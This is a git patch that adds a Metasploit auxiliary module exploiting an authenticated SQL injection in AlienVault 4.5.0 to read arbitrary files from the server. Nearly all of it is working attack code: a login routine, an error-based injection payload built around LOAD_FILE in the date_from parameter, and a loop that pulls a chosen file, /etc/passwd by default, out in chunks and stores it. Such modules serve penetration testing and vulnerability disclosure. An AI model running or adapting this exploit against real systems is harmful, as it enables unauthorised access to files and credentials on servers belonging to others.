From 765657d55ac667897afc298c273a0646fa1c4aa4 Mon Sep 17 00:00:00 2001 From: Brandon Perry Date: Wed, 2 Apr 2014 13:09:46 -0700 Subject: [PATCH] alienvault module --- .../gather/alienvault_iso27001_sqli.rb | 114 ++++++++++++++++++ 1 file changed, 114 insertions(+) create mode 100644 modules/auxiliary/gather/alienvault_iso27001_sqli.rb diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb new file mode 100644 index 0000000000..e50f55ebb8 --- /dev/null +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -0,0 +1,114 @@ +## +## This module requires Metasploit: http//metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "AlienVault 4.5.0 authenticated SQL injection arbitrary file read", + 'Description' => %q{ + AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG + generation PHP file. This module exploits this to read an arbitrary file from + the file system. Any authed user should be usable. Admin not required. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Brandon Perry ' #meatpistol module + ], + 'References' => + [['EDB', '32644'] + ], + 'Platform' => ['linux'], + 'Privileged' => false, + 'DisclosureDate' => "Mar 30 2014")) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']), + OptString.new('USERNAME', [ true, 'Single username', 'username']), + OptString.new('PASSWORD', [ true, 'Single password', 'password']), + OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/']) + ], self.class) + + end + + def run + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php') + }) + + cookie = res.get_cookies + + post = { + 'embed' => '', + 'bookmark_string' => '', + 'user' => datastore['USERNAME'], + 'passu' => datastore['PASSWORD'], + 'pass' => Rex::Text.encode_base64(datastore['PASSWORD']) + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'), + 'method' => 'POST', + 'vars_post' => post, + 'cookie' => cookie + }) + + if res.headers['Location'] != '/ossim/' + fail_with('Authentication failed') + end + + cookie = res.get_cookies + + done = false + i = 0 + full = '' + filename = datastore['FILEPATH'].unpack("H*")[0] + + while !done + pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x7175777471," + pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR)," + pay << "0x20)),#{(50*i)+1},50)),0x7169716d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS" + pay << " GROUP BY x)a) AND 'xnDa'='xnDa" + + get = { + 'date_from' => pay, + 'date_to' => '2014-03-30' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'), + 'cookie' => cookie, + 'vars_get' => get + }) + + file = /quwtq(.*)qiqmq/.match(res.body) + + file = file[1] + + if file == '' + done = true + end + + str = [file].pack("H*") + full << str + vprint_status(str) + + i = i+1 + + end + + path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH']) + print_good("File stored at path: " + path) + end +end +